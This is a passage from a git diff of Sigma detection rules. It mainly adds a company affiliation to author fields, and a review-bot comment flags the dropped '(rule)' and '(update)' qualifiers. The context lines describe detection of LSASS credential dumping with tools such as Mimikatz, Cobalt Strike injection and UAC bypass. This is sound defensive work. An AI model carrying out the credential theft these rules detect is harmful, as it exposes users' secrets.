 - https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1
 - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/06/20
 modified: 2022/11/25
 tags:
diff --git a/rules/windows/process_access/proc_access_win_cobaltstrike_bof_injection_pattern.yml b/rules/windows/process_access/proc_access_win_cobaltstrike_bof_injection_pattern.yml
index a7754713e..760f43606 100644
--- a/rules/windows/process_access/proc_access_win_cobaltstrike_bof_injection_pattern.yml
+++ b/rules/windows/process_access/proc_access_win_cobaltstrike_bof_injection_pattern.yml
@@ -5,7 +5,7 @@ description: Detects a typical pattern of a CobaltStrike BOF which inject into o
 references:
 - https://github.com/boku7/injectAmsiBypass
 - https://github.com/boku7/spawn
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/08/04
 modified: 2022/12/31
 tags:
diff --git a/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml b/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml
index de871759b..7fafb013e 100755
--- a/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml
+++ b/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml
@@ -7,7 +7,7 @@ references:
 - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html
 - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
 - http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf
-author: Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community (update)
+author: Florian Roth (Nextron Systems), Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community (update)
 date: 2017/02/16
 modified: 2023/01/25
 tags:
diff --git a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml
index 2e17840a0..bb1b85e67 100755
--- a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml
+++ b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.
 references:
 - https://medium.com/falconforce/falconfriday-direct-system-calls-and-cobalt-strike-bofs-0xff14-741fa8e1bdd6
-author: Christian Burkard, Tim Shelton
+author: Christian Burkard (Nextron Systems), Tim Shelton
 date: 2021/07/28
 modified: 2022/12/28
 tags:
diff --git a/rules/windows/process_access/proc_access_win_hack_sysmonente.yml b/rules/windows/process_access/proc_access_win_hack_sysmonente.yml
index b09a8aeef..f268d97ec 100644
--- a/rules/windows/process_access/proc_access_win_hack_sysmonente.yml
+++ b/rules/windows/process_access/proc_access_win_hack_sysmonente.yml
@@ -6,7 +6,7 @@ references:
 - https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html
 - https://github.com/codewhitesec/SysmonEnte/
 - https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/09/07
 modified: 2022/09/09
 tags:
diff --git a/rules/windows/process_access/proc_access_win_littlecorporal_generated_maldoc.yml b/rules/windows/process_access/proc_access_win_littlecorporal_generated_maldoc.yml
index 3b6b39d63..ce25dc9e2 100644
--- a/rules/windows/process_access/proc_access_win_littlecorporal_generated_maldoc.yml
+++ b/rules/windows/process_access/proc_access_win_littlecorporal_generated_maldoc.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the process injection of a LittleCorporal generated Maldoc.
 references:
 - https://github.com/connormcgarr/LittleCorporal
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/08/09
 modified: 2022/06/02
 tags:
diff --git a/rules/windows/process_access/proc_access_win_lsass_memdump_evasion.yml b/rules/windows/process_access/proc_access_win_lsass_memdump_evasion.yml
index ad52ed634..b85b77acc 100644
--- a/rules/windows/process_access/proc_access_win_lsass_memdump_evasion.yml
+++ b/rules/windows/process_access/proc_access_win_lsass_memdump_evasion.yml
@@ -6,7 +6,7 @@ references:
 - https://twitter.com/_xpn_/status/1491557187168178176
 - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz
 - https://twitter.com/mrd0x/status/1460597833917251595
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/02/10
 tags:
 - attack.credential_access
diff --git a/rules/windows/process_access/proc_access_win_lsass_memdump_indicators.yml b/rules/windows/process_access/proc_access_win_lsass_memdump_indicators.yml
index 12d89efda..506d65e66 100644
--- a/rules/windows/process_access/proc_access_win_lsass_memdump_indicators.yml
+++ b/rules/windows/process_access/proc_access_win_lsass_memdump_indicators.yml
@@ -5,7 +5,7 @@ description: Detects a possible process memory dump based on a keyword in the fi
 references:
 - https://twitter.com/_xpn_/status/1491557187168178176
 - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/02/10
 tags:
 - attack.credential_access
diff --git a/rules/windows/process_access/proc_access_win_lsass_werfault.yml b/rules/windows/process_access/proc_access_win_lsass_werfault.yml
index 50531ce34..1df422113 100644
--- a/rules/windows/process_access/proc_access_win_lsass_werfault.yml
+++ b/rules/windows/process_access/proc_access_win_lsass_werfault.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.
 references:
 - https://github.com/helpsystems/nanodump/commit/578116faea3d278d53d70ea932e2bbfe42569507
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2012/06/27
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_access/proc_access_win_malware_verclsid_shellcode.yml b/rules/windows/process_access/proc_access_win_malware_verclsid_shellcode.yml
index c53dedfbb..c316dcd43 100755
--- a/rules/windows/process_access/proc_access_win_malware_verclsid_shellcode.yml
+++ b/rules/windows/process_access/proc_access_win_malware_verclsid_shellcode.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro
 references:
 - https://twitter.com/JohnLaTwC/status/837743453039534080
-author: John Lambert (tech), Florian Roth (rule)
+author: John Lambert (tech), Florian Roth (Nextron Systems)
 date: 2017/03/04
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml b/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml
index 34222f47e..7a3b4a4f0 100644
--- a/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml
+++ b/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml
@@ -11,7 +11,7 @@ references:
 - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html
 - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
 - http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/03/13
 modified: 2022/11/13
 tags:
diff --git a/rules/windows/process_access/proc_access_win_susp_proc_access_lsass.yml b/rules/windows/process_access/proc_access_win_susp_proc_access_lsass.yml
index c6fe87bfa..e538d39f2 100644
--- a/rules/windows/process_access/proc_access_win_susp_proc_access_lsass.yml
+++ b/rules/windows/process_access/proc_access_win_susp_proc_access_lsass.yml
@@ -11,7 +11,7 @@ references:
 - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html
 - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
 - http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/11/22
 modified: 2022/06/20
 tags:
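Review bot: The new author line in the verclsid.exe hunk drops the `(rule)` qualifier that paired with John Lambert's `(tech)`, so the field no longer records who supplied the technique and who wrote the detection; the AADInternals hunk a few lines further down loses `(update)` in the same way, which previously marked that contribution as a revision rather than original authorship. The rest of this commit only appends an affiliation, and the credential-dumping hunk above keeps `oscd.community (update)` intact, so the qualifier convention is still in use. Keeping both pieces of information would be consistent with that, e.g. `author: John Lambert (tech), Florian Roth (Nextron Systems) (rule)` and `author: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems) (update)`.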
diff --git a/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml b/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml
index 50434474b..cd9ab4ea6 100644
--- a/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml
+++ b/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml
@@ -8,7 +8,7 @@ references:
 - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html
 - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
 - http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/11/27
 modified: 2022/11/01
 tags:
diff --git a/rules/windows/process_access/proc_access_win_uac_bypass_wow64_logger.yml b/rules/windows/process_access/proc_access_win_uac_bypass_wow64_logger.yml
index fa666748b..4f845f93f 100644
--- a/rules/windows/process_access/proc_access_win_uac_bypass_wow64_logger.yml
+++ b/rules/windows/process_access/proc_access_win_uac_bypass_wow64_logger.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)
 references:
 - https://github.com/hfiref0x/UACME
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/08/23
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_aadinternals_cmdlets_execution.yml b/rules/windows/process_creation/proc_creation_win_aadinternals_cmdlets_execution.yml
index 69cd97c42..b1c4006e6 100644
--- a/rules/windows/process_creation/proc_creation_win_aadinternals_cmdlets_execution.yml
+++ b/rules/windows/process_creation/proc_creation_win_aadinternals_cmdlets_execution.yml
@@ -8,7 +8,7 @@ description: Detects ADDInternals Cmdlet execution. A tool for administering Azu
 references:
 - https://o365blog.com/aadinternals/
 - https://github.com/Gerenios/AADInternals
-author: Austin Songer (@austinsonger), Nasreddine Bencherchali (update)
+author: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/23
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_advanced_port_scanner.yml b/rules/windows/process_creation/proc_creation_win_advanced_port_scanner.yml
index 04e0b5270..6b435484e 100644
--- a/rules/windows/process_creation/proc_creation_win_advanced_port_scanner.yml
+++ b/rules/windows/process_creation/proc_creation_win_advanced_port_scanner.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the use of Advanced Port Scanner.
 references:
 - https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20Port%20Scanner
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2021/12/18
 modified: 2022/11/11
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_anydesk_execution_from_susp_folders.yml b/rules/windows/process_creation/proc_creation_win_anydesk_execution_from_susp_folders.yml
index b399660e6..e18c1fabd 100644
--- a/rules/windows/process_creation/proc_creation_win_anydesk_execution_from_susp_folders.yml
+++ b/rules/windows/process_creation/proc_creation_win_anydesk_execution_from_susp_folders.yml
@@ -10,7 +10,7 @@ description: |
 Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/05/20
 modified: 2023/01/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_anydesk_piped_password_via_cli.yml b/rules/windows/process_creation/proc_creation_win_anydesk_piped_password_via_cli.yml
index b0a91ee8f..50106f67c 100644
--- a/rules/windows/process_creation/proc_creation_win_anydesk_piped_password_via_cli.yml
+++ b/rules/windows/process_creation/proc_creation_win_anydesk_piped_password_via_cli.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.
 references:
 - https://redcanary.com/blog/misbehaving-rats/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/28
 modified: 2023/01/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_apt_apt29_thinktanks.yml b/rules/windows/process_creation/proc_creation_win_apt_apt29_thinktanks.yml
index 2e55176bb..93f7c1e5e 100644
--- a/rules/windows/process_creation/proc_creation_win_apt_apt29_thinktanks.yml
+++ b/rules/windows/process_creation/proc_creation_win_apt_apt29_thinktanks.yml
@@ -5,7 +5,7 @@ description: This method detects a suspicious PowerShell command line combinatio
 references:
 - https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/
 - https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/12/04
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_apt_babyshark.yml b/rules/windows/process_creation/proc_creation_win_apt_babyshark.yml
index 0346e0818..725919284 100644
--- a/rules/windows/process_creation/proc_creation_win_apt_babyshark.yml
+++ b/rules/windows/process_creation/proc_creation_win_apt_babyshark.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects activity that could be related to Baby Shark malware
 references:
 - https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/02/24
 modified: 2022/11/11
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_apt_bear_activity_gtr19.yml b/rules/windows/process_creation/proc_creation_win_apt_bear_activity_gtr19.yml
index dfd847bc0..844017b1a 100644
--- a/rules/windows/process_creation/proc_creation_win_apt_bear_activity_gtr19.yml
+++ b/rules/windows/process_creation/proc_creation_win_apt_bear_activity_gtr19.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike
 references:
 - https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/02/21
 modified: 2022/11/11
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_apt_bluemashroom.yml b/rules/windows/process_creation/proc_creation_win_apt_bluemashroom.yml
index 0e1683007..d025705a3 100644
--- a/rules/windows/process_creation/proc_creation_win_apt_bluemashroom.yml
+++ b/rules/windows/process_creation/proc_creation_win_apt_bluemashroom.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects a suspicious DLL loading from AppData Local path as described in BlueMashroom report
 references:
 - https://www.virusbulletin.com/conference/vb2019/abstracts/apt-cases-exploiting-vulnerabilities-region-specific-software
-author: Florian Roth, Tim Shelton
+author: Florian Roth (Nextron Systems), Tim Shelton
 date: 2019/10/02
 modified: 2022/07/05
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_apt_chafer_mar18.yml b/rules/windows/process_creation/proc_creation_win_apt_chafer_mar18.yml
index 93e12faeb..9e8165e95 100644
--- a/rules/windows/process_creation/proc_creation_win_apt_chafer_mar18.yml
+++ b/rules/windows/process_creation/proc_creation_win_apt_chafer_mar18.yml
@@ -7,7 +7,7 @@ status: test
 description: Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018
 references:
 - https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/
-author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
+author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
 date: 2018/03/23
 modified: 2021/09/19
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_apt_cloudhopper.yml b/rules/windows/process_creation/proc_creation_win_apt_cloudhopper.yml
index 071337656..cf74fc090 100755
--- a/rules/windows/process_creation/proc_creation_win_apt_cloudhopper.yml
+++ b/rules/windows/process_creation/proc_creation_win_apt_cloudhopper.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects wmiexec vbs version execution by wscript or cscript
 references:
 - https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/04/07
 modified: 2022/11/11
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_apt_elise.yml b/rules/windows/process_creation/proc_creation_win_apt_elise.yml
index 40d746b10..0a682a959 100755
--- a/rules/windows/process_creation/proc_creation_win_apt_elise.yml
+++ b/rules/windows/process_creation/proc_creation_win_apt_elise.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects Elise backdoor acitivty as used by APT32
 references:
 - https://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/01/31
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_apt_emissarypanda_sep19.yml b/rules/windows/process_creation/proc_creation_win_apt_emissarypanda_sep19.yml
index 2b131ad30..aa186427d 100644
--- a/rules/windows/process_creation/proc_creation_win_apt_emissarypanda_sep19.yml
+++ b/rules/windows/process_creation/proc_creation_win_apt_emissarypanda_sep19.yml
@@ -5,7 +5,7 @@ description: Detects the execution of DLL side-loading malware used by threat gr
 references:
 - https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965
 - https://twitter.com/cyb3rops/status/1168863899531132929
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/09/03
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_apt_equationgroup_dll_u_load.yml b/rules/windows/process_creation/proc_creation_win_apt_equationgroup_dll_u_load.yml
index b22e22554..3ef5e3963 100755
--- a/rules/windows/process_creation/proc_creation_win_apt_equationgroup_dll_u_load.yml
+++ b/rules/windows/process_creation/proc_creation_win_apt_equationgroup_dll_u_load.yml
@@ -6,7 +6,7 @@ references:
 - https://github.com/adamcaudill/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=
 - https://securelist.com/apt-slingshot/84312/
 - https://twitter.com/cyb3rops/status/972186477512839170
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/03/04
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_apt_evilnum_jul20.yml b/rules/windows/process_creation/proc_creation_win_apt_evilnum_jul20.yml
index 375426f9e..2b505de59 100644
--- a/rules/windows/process_creation/proc_creation_win_apt_evilnum_jul20.yml
+++ b/rules/windows/process_creation/proc_creation_win_apt_evilnum_jul20.yml
@@ -5,7 +5,7 @@ description: Detects Golden Chickens deployment method as used by Evilnum in rep
 references:
 - https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/
 - https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/07/10
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_apt_greenbug_may20.yml b/rules/windows/process_creation/proc_creation_win_apt_greenbug_may20.yml
index 2e78e6e83..388f6d11e 100644
--- a/rules/windows/process_creation/proc_creation_win_apt_greenbug_may20.yml
+++ b/rules/windows/process_creation/proc_creation_win_apt_greenbug_may20.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects tools and process executions as observed in a Greenbug campaign in May 2020
 references:
 - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/05/20
 modified: 2021/09/21
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_apt_hafnium.yml b/rules/windows/process_creation/proc_creation_win_apt_hafnium.yml
index 4b944e144..d4ce880c0 100644
--- a/rules/windows/process_creation/proc_creation_win_apt_hafnium.yml
+++ b/rules/windows/process_creation/proc_creation_win_apt_hafnium.yml
@@ -8,7 +8,7 @@ references:
 - https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3
 - https://twitter.com/GadixCRK/status/1369313704869834753?s=20
 - https://twitter.com/BleepinComputer/status/1372218235949617161
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/03/09
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml b/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml
index bb2986d64..efd1d94e2 100755
--- a/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml
+++ b/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects Hurricane Panda Activity
 references:
 - https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/03/04
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_apt_judgement_panda_gtr19.yml b/rules/windows/process_creation/proc_creation_win_apt_judgement_panda_gtr19.yml
index 80ca5e8f4..ba565a4ed 100644
--- a/rules/windows/process_creation/proc_creation_win_apt_judgement_panda_gtr19.yml
+++ b/rules/windows/process_creation/proc_creation_win_apt_judgement_panda_gtr19.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects Judgement Panda activity as described in Global Threat Report 2019 by Crowdstrike
 references:
 - https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/02/21
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_dec20.yml b/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_dec20.yml
index cb8a67a3f..7f3098656 100644
--- a/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_dec20.yml
+++ b/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_dec20.yml
@@ -5,7 +5,7 @@ description: Detects different process creation events as described in various t
 references:
 - https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/
 - https://www.hvs-consulting.de/lazarus-report/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/12/23
 modified: 2022/12/02
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_apt_lazarus_loader.yml b/rules/windows/process_creation/proc_creation_win_apt_lazarus_loader.yml
index ad16d802a..1f41f2652 100644
--- a/rules/windows/process_creation/proc_creation_win_apt_lazarus_loader.yml
+++ b/rules/windows/process_creation/proc_creation_win_apt_lazarus_loader.yml
@@ -5,7 +5,7 @@ description: Detects different loaders as described in various threat reports on
 references:
 - https://www.hvs-consulting.de/lazarus-report/
 - https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/
-author: Florian Roth, wagga
+author: Florian Roth (Nextron Systems), wagga
 date: 2020/12/23
 modified: 2021/06/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_apt_mercury.yml b/rules/windows/process_creation/proc_creation_win_apt_mercury.yml
index ff72162c8..d67e6d617 100644
--- a/rules/windows/process_creation/proc_creation_win_apt_mercury.yml
+++ b/rules/windows/process_creation/proc_creation_win_apt_mercury.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects suspicious command line patterns as seen being used by MERCURY threat actor
 references:
 - https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/08/26
 modified: 2022/09/12
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_apt_mustangpanda.yml b/rules/windows/process_creation/proc_creation_win_apt_mustangpanda.yml
index f8d0e0367..d02676a5b 100644
--- a/rules/windows/process_creation/proc_creation_win_apt_mustangpanda.yml
+++ b/rules/windows/process_creation/proc_creation_win_apt_mustangpanda.yml
@@ -6,7 +6,7 @@ references:
 - https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/
 - https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/
 - https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations
-author: Florian Roth, oscd.community
+author: Florian Roth (Nextron Systems), oscd.community
 date: 2019/10/30
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_apt_revil_kaseya.yml b/rules/windows/process_creation/proc_creation_win_apt_revil_kaseya.yml
index 4ea229901..932945ea6 100644
--- a/rules/windows/process_creation/proc_creation_win_apt_revil_kaseya.yml
+++ b/rules/windows/process_creation/proc_creation_win_apt_revil_kaseya.yml
@@ -8,7 +8,7 @@ references:
 - https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b
 - https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/
 - https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/07/03
 modified: 2022/05/20
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_apt_slingshot.yml b/rules/windows/process_creation/proc_creation_win_apt_slingshot.yml
index 08435287b..8ae120d09 100755
--- a/rules/windows/process_creation/proc_creation_win_apt_slingshot.yml
+++ b/rules/windows/process_creation/proc_creation_win_apt_slingshot.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group
 references:
 - https://securelist.com/apt-slingshot/84312/
-author: Florian Roth, Bartlomiej Czyz (@bczyz1)
+author: Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)
 date: 2019/03/04
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_apt_sofacy.yml b/rules/windows/process_creation/proc_creation_win_apt_sofacy.yml
index 8cf5c7e32..b4304269e 100755
--- a/rules/windows/process_creation/proc_creation_win_apt_sofacy.yml
+++ b/rules/windows/process_creation/proc_creation_win_apt_sofacy.yml
@@ -6,7 +6,7 @@ references:
 - https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/
 - https://www.reverse.it/sample/e3399d4802f9e6d6d539e3ae57e7ea9a54610a7c4155a6541df8e94d67af086e?environmentId=100
 - https://twitter.com/ClearskySec/status/960924755355369472
-author: Florian Roth, Jonhnathan Ribeiro, oscd.community
+author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
 date: 2018/03/01
 modified: 2022/07/07
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_apt_ta17_293a_ps.yml b/rules/windows/process_creation/proc_creation_win_apt_ta17_293a_ps.yml
index ed2bd8bef..eebbc9a6a 100755
--- a/rules/windows/process_creation/proc_creation_win_apt_ta17_293a_ps.yml
+++ b/rules/windows/process_creation/proc_creation_win_apt_ta17_293a_ps.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report
 references:
 - https://www.us-cert.gov/ncas/alerts/TA17-293A
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/10/22
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_apt_ta505_dropper.yml b/rules/windows/process_creation/proc_creation_win_apt_ta505_dropper.yml
index ae1733d56..ea997d9cc 100644
--- a/rules/windows/process_creation/proc_creation_win_apt_ta505_dropper.yml
+++ b/rules/windows/process_creation/proc_creation_win_apt_ta505_dropper.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents
 references:
 - https://twitter.com/ForensicITGuy/status/1334734244120309760
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/12/08
 modified: 2022/03/31
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_apt_taidoor.yml b/rules/windows/process_creation/proc_creation_win_apt_taidoor.yml
index 1c9cd0832..596a782f5 100644
--- a/rules/windows/process_creation/proc_creation_win_apt_taidoor.yml
+++ b/rules/windows/process_creation/proc_creation_win_apt_taidoor.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects specific process characteristics of Chinese TAIDOOR RAT malware load
 references:
